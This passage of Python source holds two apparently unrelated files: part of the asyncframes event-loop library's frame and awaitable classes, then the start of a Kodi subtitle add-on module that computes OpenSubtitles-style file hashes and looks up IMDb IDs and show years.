self.event_queue.get(False)
except queue.Empty:
break
# Clear main eventloop
self._clear()
self._idle = True
# Stop worker eventloops
for eventloop in self.eventloops[1:]: eventloop._invoke(0, eventloop._stop, ())
for worker in workers: self._jointhread(worker)
def _enqueue(self, delay, callback, args, eventloop_affinity=None):
if len(self.eventloops) == 1: # If running singlethreaded, ...
# Execute callback from current eventloop
if _THREAD_LOCALS._current_eventloop == self:
self._post(delay, callback, args)
else:
self._invoke(delay, callback, args)
elif eventloop_affinity: # If a target eventloop was provided, ...
# Execute callback from target eventloop
if _THREAD_LOCALS._current_eventloop == eventloop_affinity:
eventloop_affinity._post(delay, callback, args)
else:
eventloop_affinity._invoke(delay, callback, args)
else: # If no target eventloop was provided, ...
if delay > 0.0:
# Call _enqueue again with 0 delay after 'delay' seconds
#TODO: Consider running a dedicated event loop instead of eventloops[-1] for delays
if _THREAD_LOCALS._current_eventloop == self.eventloops[-1]:
self.eventloops[-1]._post(delay, self.eventloops[-1]._enqueue, (0.0, callback, args))
else:
self.eventloops[-1]._invoke(delay, self.eventloops[-1]._enqueue, (0.0, callback, args))
else: # If delay == 0, ...
# Place the callback on the event queue
self.event_queue.put((callback, args))
# Wake up an idle eventloop (if any)
for eventloop in self.eventloops:
if eventloop._idle:
eventloop._idle = False
eventloop._invoke(0, eventloop._dequeue, ())
break
def _dequeue(self):
try:
callback, args = self.event_queue.get_nowait()
except queue.Empty:
self._idle = True
else:
callback(*args)
if not self.event_queue.empty():
self._post(0, self._dequeue, ())
else:
self._idle = True
@staticmethod
def sendevent(eventsource, event, process_counter=None, blocking=False):
# Save current frame, since it will be modified inside Awaitable.process()
currentframe = _THREAD_LOCALS._current_frame
try:
eventsource.process(eventsource, event, process_counter, blocking)
finally:
# Restore current frame
_THREAD_LOCALS._current_frame = currentframe
def postevent(self, eventsource, event, delay=0):
self._enqueue(delay, AbstractEventLoop.sendevent, (eventsource, event, None, False), eventsource._eventloop_affinity)
def process(self, sender, msg, process_counter=None, blocking=False):
self._result = msg
self._stop() # Stop event loop
class Awaitable(collections.abc.Awaitable):
"""An awaitable frame or event.
Every node in the frame hierarchy is a subclass of `Awaitable`. An awaitable has a `__name__`,
a parent awaitable (None, if the awaitable is the main frame), a list of child awaitables and
a result, that gets set when the awaitable finishes.
Args:
name (str): The name of the awaitable.
"""
def __init__(self, name, singleshot, lifebound):
self.__name__ = name
self.singleshot = singleshot
self.lifebound = lifebound
self.fired = False
self._parent = _THREAD_LOCALS._current_frame
if self._parent is not None:
self._parent._children.append(self)
self._removed = False
self._result = None
self._listeners = set()
self._current_inline_frame = self
self._is_inline_frame = False
self._eventloop_affinity = None
self.exception_handler = None
def _ondispose(self):
"""Virtual function for cleaning up a derived class.
This function is called after awaiting frames have been woken, but before the class is deleted."""
pass
def _remove(self, process_counter=None, blocking=False, ondone=lambda result: None):
# Mark self as removed
if self._removed:
ondone(False)
if process_counter:
process_counter.sub(1)
return
self._removed = True
# Remove self from parent frame
if self._parent is not None:
self._parent._children.remove(self)
if self.lifebound:
# Wake up listeners
self.fired = True
if self._listeners:
listeners = self._listeners
self._listeners = set()
if blocking:
if process_counter:
process_counter.add(len(listeners))
for listener in listeners:
if listener._eventloop_affinity is None or listener._eventloop_affinity == _THREAD_LOCALS._current_eventloop:
listener.process(self, self._result, process_counter, blocking)
else:
listener._eventloop_affinity._invoke(0, listener.process, (self, self._result, process_counter, blocking))
else:
for listener in listeners:
_THREAD_LOCALS._current_eventloop._enqueue(0, listener.process, (self, self._result), listener._eventloop_affinity)
self._ondispose()
del self
ondone(True)
if process_counter:
process_counter.sub(1)
return
def remove(self):
"""Remove this awaitable from the frame hierarchy.
Returns:
Event: An awaitable event.
The remove event returns True once the awaitable has been removed, or False if
the request was canceled or the awaitable had already been removed before.
"""
remove_event = Event(str(self.__name__) + ".remove", singleshot=True, lifebound=False)
process_counter = _AtomicCounter(1, lambda result: AbstractEventLoop.sendevent(remove_event, result, None, True)) # Add process: Frame.remove
process_counter.on_zero_args = (True,) # Default remove() result to True
def onremoved(result):
process_counter.on_zero_args = (result,)
self._remove(process_counter, False, onremoved)
return remove_event
@property
def removed(self):
"""Boolean property, indicating whether this awaitable has been removed from the frame hierarchy."""
return self._removed
def __str__(self):
"""Human readable representation of this frame."""
return self.__name__
def __repr__(self):
return "<{}.{} object at 0x{:x}>".format(self.__module__, self.__name__, id(self))
def __lt__(self, other):
"""Make awaitables sortable by name."""
return self.__name__ < other.__name__
def __bool__(self):
return (self.lifebound and self._removed) or (self.singleshot and self.fired)
def __await__(self):
if self: # If this awaitable already finished
return self._result
try:
return (yield self)
except (StopIteration, GeneratorExit):
return self._result
@abc.abstractmethod
def _step(self, sender, msg):
raise NotImplementedError # pragma: no cover
def process(self, sender, msg, process_counter=None, blocking=False):
"""Handle an incomming event from the eventloop.
.. deprecated:: 2.1
This method will be made private in a future release of asyncframes.
Args:
sender (Awaitable): The source of the event.
msg: The incomming event.
process_counter (_AtomicCounter, optional): Defaults to None. A thread-safe counter that determines when an event has been fully processed.
blocking (bool, optional): Defaults to False. If True, doesn't return until the event was fully processed.
"""
_THREAD_LOCALS._current_frame = self._current_inline_frame # Activate self
try:
self._step(sender, msg)
except BaseException as err:
if getattr(self, 'ready', True): # If self is ready or self doesn't have a ready event
# Send ready event to all listeners that have a ready event, but aren't ready yet
for listener in self._listeners:
if not getattr(listener, 'ready', True):
AbstractEventLoop.sendevent(listener.ready, None, None, True)
# Store result
if type(err) == StopIteration:
self._result = err.value
elif type(err) != GeneratorExit:
self._result = err
# Call exception handler
if err != msg:
awaitable = self
while awaitable is not None:
if awaitable.exception_handler:
try:
awaitable.exception_handler(self, err)
except Exception as exception_handler_err:
err = exception_handler_err
else:
break
awaitable = awaitable._parent
if awaitable is None:
maineventloop = _THREAD_LOCALS._current_eventloop.eventloops[0]
maineventloop._exception = err
if maineventloop._eventloop_affinity is None or maineventloop._eventloop_affinity == _THREAD_LOCALS._current_eventloop:
maineventloop._stop()
else:
maineventloop._eventloop_affinity._invoke(0, maineventloop._stop, ())
if self.singleshot:
if process_counter:
process_counter.add(1)
self._remove(process_counter, blocking) # Remove awaitable and propagate event
# Wake up listeners
self.fired = True
if self._listeners:
listeners = self._listeners
self._listeners = set()
if blocking:
if process_counter:
process_counter.add(len(listeners))
for listener in listeners:
if listener._eventloop_affinity is None or listener._eventloop_affinity == _THREAD_LOCALS._current_eventloop:
listener.process(self, self._result, process_counter, blocking)
else:
listener._eventloop_affinity._invoke(0, listener.process, (self, self._result, process_counter, blocking))
else:
for listener in listeners:
_THREAD_LOCALS._current_eventloop._enqueue(0, listener.process, (self, self._result), listener._eventloop_affinity)
# if self.singleshot:
# return # Don't decrease process_counter, since it was already decreased by self._remove()
else:
if getattr(self, 'ready', True): # If self is ready or self doesn't have a ready event
# Send ready event to all listeners that have a ready event, but aren't ready yet
for listener in self._listeners:
if not getattr(listener, 'ready', True):
AbstractEventLoop.sendevent(listener.ready, None, None, True)
if process_counter:
process_counter.sub(1)
def __and__(self, other):
"""Register A & B as shortcut for ``all_(A, B)``.
Args:
other (Awaitable): The other awaitable.
Returns:
all\_: A frame awaiting `self` and `other`.
"""
return all_(self, other)
def __or__(self, other):
"""Register A | B as shortcut for ``any_(A, B)``.
Args:
other (Awaitable): The other awaitable.
Returns:
any\_: A frame awaiting `self` or `other`.
"""
return any_(self, other)
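# Usage sketch: given two awaitables A and B, `await (A & B)` resumes once both have fired and
# yields a list of their results, while `await (A | B)` resumes as soon as either fires and
# yields a (sender, result) tuple (see all_._step and any_._step below).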
class Event(Awaitable):
"""An awaitable event.
Instantiate or overload this class to implement new events.
Each type of event should be emitted by exactly one event class.
For example, key-up and key-down events should be implemented by two separate events.
Events represent leaf nodes in the frame hierarchy.
Args:
name (str): The name of the event.
singleshot (bool, optional): Defaults to False. If True, removes the event after it has been woken.
"""
def __init__(self, name, singleshot=False, lifebound=False):
super().__init__(name, singleshot, lifebound)
self.eventloop = _THREAD_LOCALS._current_eventloop # Store creating eventloop, as a fallback in case self.post() is called from a thread without an eventloop
def _step(self, sender, msg):
"""Handle incoming events.
Args:
sender (Event): The event to be handled. This value is always identical to `self`.
msg: The event arguments.
Raises:
StopIteration: If this event should wake up awaiting frames, raise a StopIteration with `value` set to the event arguments.
"""
stop = StopIteration()
stop.value = msg
raise stop
def send(self, args=None):
"""Dispatch and immediately process an event.
Args:
args (optional): Defaults to None. Event arguments, for example, the progress value on a progress-update event.
"""
send_event = Event(str(self.__name__) + ".send", singleshot=True)
process_counter = _AtomicCounter(1, lambda: AbstractEventLoop.sendevent(send_event, None, None, True))
AbstractEventLoop.sendevent(self, args, process_counter, True)
return send_event
def post(self, args=None, delay=0):
"""Enqueue an event in the event loop.
Args:
args (optional): Defaults to None. Event arguments, for example, the progress value on a progress-update event.
delay (float, optional): Defaults to 0. The time in seconds to wait before posting the event.
"""
(_THREAD_LOCALS._current_eventloop or self.eventloop).postevent(self, args, delay)
class all_(Awaitable):
"""An awaitable that blocks the awaiting frame until all passed awaitables have woken up.
Args:
awaitables (Awaitable[]): A list of all awaitables to await.
"""
def __init__(self, *awaitables):
super().__init__("all({})".format(", ".join(str(a) for a in awaitables)), singleshot=True, lifebound=True)
self._remove_lock = threading.Lock()
self._awaitables = collections.defaultdict(list)
self._result = [None] * len(awaitables)
for i, awaitable in enumerate(awaitables):
if awaitable:
self._result[i] = awaitable._result
else:
self._awaitables[awaitable].append(i)
awaitable._listeners.add(self)
if not self._awaitables:
self._remove()
return
def _step(self, sender, msg):
"""Respond to an awaking child.
Args:
sender (Awaitable): The awaking child.
msg: The awaking child's result or an exception raised in a child frame.
Raises:
StopIteration: Once all children woke up, this raises a StopIteration with `value` set to a dict of all children's results.
BaseException: If msg is an Exception other than GeneratorExit or StopIteration, the exception is re-raised.
"""
for i in self._awaitables.pop(sender, ()):
self._result[i] = msg
if not self._awaitables:
stop = StopIteration()
stop.value = self._result
raise stop
def _remove(self, process_counter=None, blocking=False, ondone=lambda result: None):
if self.removed:
ondone(False)
if process_counter:
process_counter.sub(1)
return
with self._remove_lock:
if self.removed: # If this frame was closed while acquiring the lock, ...
ondone(False)
if process_counter:
process_counter.sub(1)
return
for awaitable in self._awaitables:
awaitable._listeners.discard(self)
self._awaitables.clear()
# Remove awaitable
super()._remove(process_counter, blocking, ondone)
return
if process_counter:
process_counter.sub(1)
ondone(False)
class any_(Awaitable):
"""An awaitable that blocks the awaiting frame until any of the passed awaitables wakes up.
Args:
awaitables (Awaitable[]): A list of all awaitables to await.
"""
def __init__(self, *awaitables):
super().__init__("any({})".format(", ".join(str(a) for a in awaitables)), singleshot=True, lifebound=True)
self._remove_lock = threading.Lock()
self._awaitables = set()
for awaitable in awaitables:
if awaitable:
self._result = (awaitable, awaitable._result)
self._remove()
return
else:
self._awaitables.add(awaitable)
awaitable._listeners.add(self)
def _step(self, sender, msg):
"""Respond to an awaking child.
Args:
sender (Awaitable): The awaking child.
msg: The awaking child's result or an exception raised in a child frame.
Raises:
StopIteration: If msg indicates an awaking child, store its result as this frame's result.
BaseException: Forward any exceptions.
"""
stop = StopIteration()
stop.value = (sender, msg)
raise stop
def _remove(self, process_counter=None, blocking=False, ondone=lambda result: None):
if self.removed:
ondone(False)
if process_counter:
process_counter.sub(1)
return
with self._remove_lock:
if self.removed: # If this frame was closed while acquiring the lock, ...
ondone(False)
if process_counter:
process_counter.sub(1)
return
for awaitable in self._awaitables:
awaitable._listeners.discard(self)
self._awaitables.clear()
# Remove awaitable
super()._remove(process_counter, blocking, ondone)
return
if process_counter:
process_counter.sub(1)
ondone(False)
class sleep(Event):
"""An awaitable event used for suspending execution by the specified amount of time.
A duration of 0 seconds will resume the awaiting frame as soon as possible.
This is useful to implement non-blocking loops.
Args:
seconds (float, optional): Defaults to 0. The duration to wait.
"""
def __init__(self, seconds=0.0):
super().__init__("sleep({})".format(seconds), singleshot=True, lifebound=False)
# Raise event
self.post(None, max(0, seconds))
class hold(Event):
"""An awaitable event used for suspending execution indefinitely.
Frames are automatically removed when the frame coroutine finishes.
If you would like the frame to remain open until it is removed, write `await hold()` at the end of the coroutine.
"""
def __init__(self):
super().__init__("hold()", singleshot=True, lifebound=False)
def _step(self, sender, msg):
""" Ignore any incoming events."""
pass
class animate(Event):
"""An awaitable event used for periodically calling a callback function for the specified amount of time.
Args:
seconds (float): The duration of the animation.
callback (Callable[float, None]): The function to be called on every iteration. The first parameter of `callback` indicates animation progress between 0 and 1.
interval (float, optional): Defaults to 0.0. The minimum time in seconds between two consecutive calls of the callback.
"""
def __init__(self, seconds, callback, interval=0.0):
super().__init__("animate()", singleshot=True, lifebound=False)
self.seconds = seconds
self.callback = callback
self.interval = interval
self.startTime = datetime.datetime.now()
self._final_event = False
# Raise event
if seconds <= interval:
self._final_event = True
self.post(None, max(0, seconds))
else:
self.post(None, interval)
def _step(self, sender, msg):
"""Resend the animation event until the timeout is reached."""
t = (datetime.datetime.now() - self.startTime).total_seconds()
if t >= self.seconds or self._final_event:
self.callback(1.0)
stop = StopIteration()
stop.value = msg
raise stop
else:
self.callback(t / self.seconds)
t = (datetime.datetime.now() - self.startTime).total_seconds() # Recompute t after callback
# Reraise event
if self.seconds - t <= self.interval:
self._final_event = True
self.post(None, max(0, self.seconds - t))
else:
self.post(None, self.interval)
class FrameMeta(abc.ABCMeta):
def __new__(mcs, name, bases, dct):
frameclass = super().__new__(mcs, name, bases, dct)
if bases != (Awaitable,): # If frameclass != Frame, ...
frameclass.Factory = type(frameclass.__name__ + '.Factory', (frameclass.Factory,), {}) # Derive factory from base class factory
frameclass.Factory.frameclass = frameclass
return frameclass
def __enter__(self):
return self().__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
return self().__exit__(exc_type, exc_val, exc_tb)
class Frame(Awaitable, metaclass=FrameMeta):
"""An object within the frame hierarchy.
This class represents the default frame class. All other frame classes have
to be derived from :class:`Frame`.
A frame is an instance of a frame class. Use the nested Factory class to
create frames.
The factory class is created by decorating a function or coroutine with
``@FRAME``, where ``FRAME`` is the frame class.
Example: ::
class MyFrameClass(Frame):
pass
@MyFrameClass
async def my_frame_factory():
pass
assert(type(my_frame_factory) == MyFrameClass.Factory)
my_frame = my_frame_factory()
assert(type(my_frame) == MyFrameClass)
Args:
startup_behaviour (FrameStartupBehaviour, optional): Defaults to FrameStartupBehaviour.delayed.
Controls whether the frame is started immediately or queued on the eventloop.
thread_idx (int, optional): Defaults to None. If set, forces the scheduler to affiliate this frame with the given thread.
Attributes:
free (Event): An event that fires just before the frame is removed.
ready (Event): An event that fires the first time the frame is suspended (using ``await``) or goes out of scope.
Raises:
ValueError: If `thread_idx` is outside the range of allocated threads.
The number of allocated threads is controlled by the `num_threads` parameter of :meth:`AbstractEventLoop.run`.
"""
class Factory(object):
"""A frame function declared in the context of a frame class.
Args:
framefunc (Callable): The function or coroutine that describes the frame's behaviour.
frameclassargs (tuple): Positional arguments to the frame class.
frameclasskwargs (dict): Keyword arguments to the frame class.
"""
def __init__(self, framefunc, frameclassargs, frameclasskwargs):
self.framefunc = framefunc
self.frameclassargs = frameclassargs
self.frameclasskwargs = frameclasskwargs
def __call__(self, *frameargs, **framekwargs):
"""Produce an instance of the frame.
Raises:
InvalidOperationException: Raised when no event loop is currently running.
Returns:
Frame: The newly created frame instance.
"""
if self.framefunc is None:
self.framefunc = frameargs[0]
return self
if _THREAD_LOCALS._current_eventloop is None:
raise InvalidOperationException("Can't call frame without a running event loop")
frame = super(Frame, self.__class__.frameclass).__new__(self.__class__.frameclass)
frame.__init__(*self.frameclassargs, **self.frameclasskwargs)
frame.create(self.framefunc, *frameargs, **framekwargs)
return frame
def __enter__(self):
if self.framefunc is None:
# Instantiate frame class with empty framefunc
self.framefunc = lambda: None
self.framefunc.__name__ = self.frameclass.__name__
with_frame = self()
self.framefunc = None
else:
# Instantiate frame class with self.framefunc
with_frame = self()
with_frame._is_inline_frame = True
# Activate frame instance
non_with_frame_parent = _THREAD_LOCALS._current_frame
while non_with_frame_parent._is_inline_frame:
non_with_frame_parent = non_with_frame_parent._parent
non_with_frame_parent._current_inline_frame = with_frame._current_inline_frame
_THREAD_LOCALS._current_frame = with_frame._current_inline_frame
return with_frame
def __exit__(self, exc_type, exc_val, exc_tb):
# Activate parent
non_with_frame_parent = _THREAD_LOCALS._current_frame
while non_with_frame_parent._is_inline_frame:
non_with_frame_parent = non_with_frame_parent._parent
non_with_frame_parent._current_inline_frame = _THREAD_LOCALS._current_frame._parent
_THREAD_LOCALS._current_frame = _THREAD_LOCALS._current_frame._parent
def __new__(cls, *frameclassargs, **frameclasskwargs):
if len(frameclassargs) == 1 and not frameclasskwargs and callable(frameclassargs[0]): # If @frame was called without parameters
return cls.Factory(frameclassargs[0], (), {})
else: # If @frame was called with parameters
return cls.Factory(None, frameclassargs, frameclasskwargs)
def __init__(self, startup_behaviour=FrameStartupBehaviour.delayed, thread_idx=None):
if thread_idx is not None and (thread_idx < 0 or thread_idx >= len(_THREAD_LOCALS._current_eventloop.eventloops)):
raise ValueError("thread_idx must be an index between 0 and " + str(len(_THREAD_LOCALS._current_eventloop.eventloops)))
super().__init__(self.__class__.__name__, singleshot=True, lifebound=True)
_THREAD_LOCALS._current_frame = self._current_inline_frame
self.startup_behaviour = startup_behaviour
self._children = []
self._activechild = None
self._primitives = []
self._generator = None
self._generator_eventloop = None
self._freeing = False
self.ready = Event(str(self.__name__) + ".ready", True)
self.ready.ready = self.ready # Set ready state of ready event to itself. This way the ready event will propagate through `await frame.ready`
self.free = Event(str(self.__name__) + ".free", False)
self._eventloop_affinity = _THREAD_LOCALS._current_eventloop
if thread_idx is not None:
self._eventloop_affinity = self._eventloop_affinity.eventloops[thread_idx]
self._remove_lock = threading.Lock()
_THREAD_LOCALS._current_frame = self._current_inline_frame._parent
def create(self, framefunc, *frameargs, **framekwargs):
"""Start the frame function with the given arguments.
Args:
framefunc (function): A coroutine or regular function controlling the behaviour of this frame.
If `framefunc` is a coroutine, then the frame only exists until the coroutine exits.
"""
if framefunc and not self.removed and self._generator is None:
self.__name__ = framefunc.__name__
self.ready.__name__ = str(self.__name__) + ".ready"
self.free.__name__ = str(self.__name__) + ".free"
# Activate self
_THREAD_LOCALS._current_frame = self._current_inline_frame
hasself = 'self' in inspect.signature(framefunc).parameters
self._generator = framefunc(self, *frameargs, **framekwargs) if hasself else framefunc(*frameargs, **framekwargs)
if inspect.isawaitable(self._generator): # If framefunc is a coroutine
if self.startup_behaviour == FrameStartupBehaviour.delayed:
# Post coroutine to the event queue
_THREAD_LOCALS._current_eventloop.postevent(self, None, 0.0)
elif self.startup_behaviour == FrameStartupBehaviour.immediate:
# Start coroutine
try:
self._step(None, None)
except (StopIteration, GeneratorExit):
pass
finally:
# Activate parent
_THREAD_LOCALS._current_frame = self._current_inline_frame._parent
else:
raise ValueError('startup_behaviour must be FrameStartupBehaviour.delayed or FrameStartupBehaviour.immediate')
else: # If framefunc is a regular function
AbstractEventLoop.sendevent(self.ready, None, None, True) # Send ready event
# Activate parent
_THREAD_LOCALS._current_frame = self._current_inline_frame._parent
def _step(self, sender, msg):
"""Resume the frame coroutine.
Args:
sender (Awaitable): The resumed awaitable.
msg: A message to be forwarded to the coroutine or None to start the coroutine.
Raises:
StopIteration: Raised if the coroutine finished with a result.
GeneratorExit: Raised if the coroutine finished without a result.
Exception: Raised if the coroutine encountered an error.
"""
if self.removed:
stop = StopIteration()
stop.value = self._result
raise stop
if self._generator is not None:
self._generator_eventloop = _THREAD_LOCALS._current_eventloop
try:
awaitable = self._generator.send(msg) # Continue coroutine
except (StopIteration, GeneratorExit): # If frame finished
self._generator_eventloop = None
if msg is None: AbstractEventLoop.sendevent(self.ready, None, None, True) # Send ready event if frame finished without ever being awaited
raise # Propagate event
except Exception as err: # If frame raised exception
self._generator_eventloop = None
raise # Propagate event
else: # If frame awaits awaitable
self._generator_eventloop = None
awaitable._listeners.add(self) # Listen to events of awaitable
# Send ready event if not yet ready and awaitable is ready or doesn't have a ready event
if getattr(awaitable, 'ready', True) and not self.ready: # If awaitable is ready or awaitable doesn't have a ready event
AbstractEventLoop.sendevent(self.ready, None, None, True)
def _mark_freeing(self, value):
self._freeing = value
for child in self._children:
if isinstance(child, Frame):
child._mark_freeing(value)
def _send_free_event(self, free_args, process_counter):
process_counter.add(len(self._children))
# Send child frame free events
for child in self._children[:]:
if not child.removed and isinstance(child, Frame):
child._send_free_event(free_args, process_counter)
else:
process_counter.sub(1)
# Send current frame free event
AbstractEventLoop.sendevent(self.free, free_args, process_counter, True)
def _remove(self, process_counter=None, blocking=False, ondone=lambda result: None):
if self._freeing: # If this frame's free event is being processed, ...
self._remove_stage2(process_counter, blocking, ondone) # Remove the frame
else: # If this frame's free event wasn't sent yet, ...
self._mark_freeing(True) # Mark this frame and all children for removal
free_args = FreeEventArgs()
def after_free():
if free_args.cancel: # If the free event was canceled, ...
self._mark_freeing(False) # Unmark this frame and all children from removal
ondone(False) # Awake awaiting frames with value 'False'
if process_counter:
process_counter.sub(1)
elif self._removed: # If this frame was removed as a result of the free event, ...
ondone(True) # Awake awaiting frames with value 'True'
if process_counter:
process_counter.sub(1)
else: # If the free event wasn't canceled and didn't remove this frame, ...
self._remove_stage2(process_counter, blocking, ondone) # Remove this frame
self._send_free_event(free_args, _AtomicCounter(1, after_free))
def _remove_stage2(self, process_counter=None, blocking=False, ondone=lambda result: None):
if self.removed or not self._remove_lock.acquire(blocking=False): # If this frame was closed in response to the free event or removal is already in progress, ...
ondone(False)
if process_counter:
process_counter.sub(1) # Remove process: Frame._remove_stage2
else:
try:
# Remove child frames
genexit = None
if process_counter:
process_counter.add(len(self._children))
while self._children:
try:
self._children[-1]._remove(process_counter, blocking)
except GeneratorExit as err:
genexit = err # Delay raising GeneratorExit
# Remove primitives
while self._primitives:
self._primitives[-1].remove()
# Stop framefunc
if self._generator: # If framefunc is a coroutine
genevtlp = self._generator_eventloop # Avoid race condition between if and invoke
if genevtlp == _THREAD_LOCALS._current_eventloop: # If the coroutine is running on the current eventloop
# Calling coroutine.close() from within the coroutine is illegal, so we throw a GeneratorExit manually instead
try:
self._generator.close()
except ValueError:
genexit = GeneratorExit()
self._generator = None
elif genevtlp is not None: # If the coroutine is running on another eventloop
if process_counter:
process_counter.add(1) # Add process: Frame._remove_stage3
genevtlp._invoke(0, self._remove_stage3, (process_counter,))
else: # If the coroutine isn't running
self._generator.close()
self._generator = None
# Remove awaitable
super()._remove(process_counter, blocking, ondone)
finally:
self._remove_lock.release()
# Raise delayed GeneratorExit exception
if genexit:
raise genexit
def _remove_stage3(self, process_counter=None):
genevtlp = self._generator_eventloop # Avoid race condition between if and invoke
if genevtlp is None or genevtlp == _THREAD_LOCALS._current_eventloop: # If the coroutine isn't running or it's running on the current eventloop
self._generator.close()
if process_counter:
process_counter.sub(1) # Remove process: Frame._remove_stage3
else: # If the coroutine is running on another eventloop
genevtlp._invoke(0, self._remove_stage3, (process_counter,))
class PFrame(Frame):
"""A parallel :class:`Frame` that can run on any thread.
Multithreading can be enabled for any frame by changing its base class to
:class:`PFrame`.
The only difference between :class:`Frame` and :class:`PFrame` is that
instances of :class:`PFrame` are not restricted to run on the same thread as
their parent frame.
Args:
startup_behaviour (FrameStartupBehaviour, optional): Defaults to FrameStartupBehaviour.delayed.
Controls whether the frame is started immediately or queued on the eventloop.
thread_idx (int, optional): Defaults to None. If set, forces the scheduler to affiliate this frame with the given thread.
Raises:
ValueError: If `thread_idx` is outside the range of allocated threads.
The number of allocated threads is controlled by the `num_threads` parameter of :meth:`AbstractEventLoop.run`.
"""
def __init__(self, startup_behaviour=FrameStartupBehaviour.delayed, thread_idx=None):
super().__init__(startup_behaviour, thread_idx)
if thread_idx is None:
self._eventloop_affinity = None
class Primitive(object):
"""An object owned by a frame of the specified frame class.
A primitive has to be created within the frame function of its owner or within the frame function of any child frame of its owning frame class.
If it is created within a child frame, it will still be registered with the closest parent of the owning frame class.
Args:
owner (class): The owning frame class.
Raises:
TypeError: Raised if owner is not a frame class.
Exception: Raised if a primitive is created outside the frame function of its owning frame class.
"""
def __init__(self, owner):
self._removed = False
# Validate parameters
if not issubclass(owner, Frame):
raise TypeError("'owner' must be of type Frame")
# Find parent frame of class 'owner'
self._owner = find_parent(owner)
if self._owner is None:
raise InvalidOperationException(self.__class__.__name__ + " can't be defined outside " + owner.__name__)
# Register with parent frame
self._owner._primitives.append(self)
def _ondispose(self):
"""Virtual function for cleaning up a derived class.
This function is called before the class is deleted."""
pass
def remove(self):
"""Remove this primitive from its owner.
Returns:
bool: If True, this primitive was removed. If False, the request was either canceled or the primitive had already been removed before.
"""
if self._removed:
return False
self._removed = True
self._owner._primitives.remove(self)
self._ondispose()
del self
return True
def get_current_eventloop_index():
"""Get the thread index of the currently active event loop.
Returns:
int: The thread index of the current event loop or None if no event loop is currently active.
"""
return _THREAD_LOCALS._current_eventloop.eventloops.index(_THREAD_LOCALS._current_eventloop) if getattr(_THREAD_LOCALS, '_current_eventloop', None) and hasattr(_THREAD_LOCALS._current_eventloop, 'eventloops') else None
def find_parent(parenttype):
"""Find parent frame of given type.
Recursively search the frame hierarchy for the closest ancestor of the given type.
Args:
parenttype (type): The frame class type to search for.
Returns:
Frame: The closest ancestor of type ``parenttype`` or None if none was found.
"""
parent = _THREAD_LOCALS._current_frame
while parent is not None and not isinstance(parent, parenttype):
parent = parent._parent
return parent
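# Minimal end-to-end sketch (assuming a concrete AbstractEventLoop implementation is
# available; the asyncframes package ships several, e.g. an asyncio-based EventLoop):
#
#   from asyncframes.asyncio_eventloop import EventLoop  # assumed import path
#
#   @Frame
#   async def main_frame():
#       await sleep(0.1)
#       return 42
#
#   loop = EventLoop()
#   result = loop.run(main_frame)  # runs the frame hierarchy; result == 42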
|
video.py | # -*- coding: utf-8 -*-
import os
import json
import struct
import hashlib
import re
import threading
from .kodi import xbmc, xbmcvfs, get_bool_setting
from . import logger, cache, utils, request
__64k = 65536
__longlong_format_char = 'q'
__byte_size = struct.calcsize(__longlong_format_char)
def __sum_64k_bytes(file, result):
range_value = __64k / __byte_size
if utils.py3:
range_value = round(range_value)
for _ in range(range_value):
try: chunk = file.readBytes(__byte_size)
except: chunk = file.read(__byte_size)
(value,) = struct.unpack(__longlong_format_char, chunk)
result.filehash += value
result.filehash &= 0xFFFFFFFFFFFFFFFF
def __set_size_and_hash(core, meta, filepath):
if core.progress_dialog and not core.progress_dialog.dialog:
core.progress_dialog.open()
f = xbmcvfs.File(filepath)
try:
filesize = meta.filesize = f.size()
# used for mocking
try:
meta.filehash = f.hash()
return
except: pass
if filesize < __64k * 2:
return
# ref: https://trac.opensubtitles.org/projects/opensubtitles/wiki/HashSourceCodes
# filehash = filesize + 64bit sum of the first and last 64k of the file
result = lambda: None
result.filehash = filesize
__sum_64k_bytes(f, result)
f.seek(filesize - __64k, os.SEEK_SET)
__sum_64k_bytes(f, result)
meta.filehash = "%016x" % result.filehash
finally:
f.close()
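# For reference, the same OpenSubtitles-style hash could be computed for a plain local file
# (outside Kodi's VFS) roughly as below; a sketch only, assuming the file is at least 128 KiB:
#
#   def opensubtitles_hash(path):
#       filesize = os.path.getsize(path)
#       filehash = filesize
#       with open(path, 'rb') as f:
#           for offset in (0, filesize - __64k):
#               f.seek(offset)
#               for _ in range(__64k // __byte_size):
#                   (value,) = struct.unpack(__longlong_format_char, f.read(__byte_size))
#                   filehash = (filehash + value) & 0xFFFFFFFFFFFFFFFF
#       return "%016x" % filehash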
def __get_filename(title):
filename = title
video_exts = ['mkv', 'mp4', 'avi', 'mov', 'mpeg', 'flv', 'wmv']
try:
filepath = xbmc.Player().getPlayingFile()
filename = filepath.split('/')[-1]
filename = utils.unquote(filename)
for ext in video_exts:
if ext in filename:
filename = filename[:filename.index(ext) + len(ext)]
break
except: pass
return filename
def __scrape_tvshow_year(core, meta):
imdb_response = request.execute(core, {
'method': 'GET',
'url': 'https://www.imdb.com/title/' + meta.imdb_id,
'timeout': 10,
})
if imdb_response.status_code != 200:
return
show_year_match = re.search(r' %s \((.*?)\)"' % meta.tvshow, imdb_response.text)
if not show_year_match:
show_year_match = re.search(r'<title>.*?\(TV (?:Mini-)?Series (\d\d\d\d).*?</title>', imdb_response.text)
if not show_year_match:
show_year_match = re.search(r'<span class="parentDate">\((\d\d\d\d).*?\)</span>', imdb_response.text)
if show_year_match:
meta.tvshow_year = show_year_match.group(1).strip()
tvshow_years_cache = cache.get_tvshow_years_cache()
tvshow_years_cache[meta.imdb_id] = meta.tvshow_year
cache.save_tvshow_years_cache(tvshow_years_cache)
def __scrape_imdb_id(core, meta):
if meta.title == '' or meta.year == '':
return
is_movie = meta.season == '' and meta.episode == ''
title = (meta.title if is_movie else meta.tvshow).lower()
year = '_%s' % meta.year if is_movie else ''
query = '%s%s' % (title.lower().replace(' ', '_'), year)
query = query[:20]
request = {
'method': 'GET',
'url': 'https://v2.sg.media-imdb.com/suggestion/%s/%s.json' % (query[:1], query),
'timeout': 10
}
response = core.request.execute(core, request)
if response.status_code != 200:
return
results = core.json.loads(response.text)
if len(results['d']) == 0:
return
def filter_movie_results(result):
year_start = result.get('y', None)
result_type = result.get('q', None)
return (
result_type is not None and result_type in ['feature', 'TV movie'] and
result['l'].lower() == title and
(year_start is not None and year_start == year)
)
if is_movie:
year = int(meta.year)
results = list(filter(filter_movie_results, results['d']))
if len(results) > 0:
meta.imdb_id = results[0]['id']
return
show_title = title.lower()
episode_title = meta.title.lower()
episode_year = int(meta.year)
def filter_tvshow_results(result):
year_start = result.get('y', None)
year_end = result.get('yr', '-').split('-')[1]
result_type = result.get('q', None)
return (
result_type is not None and result_type in ['TV series', 'TV mini-series'] and
result['l'].lower() == show_title and
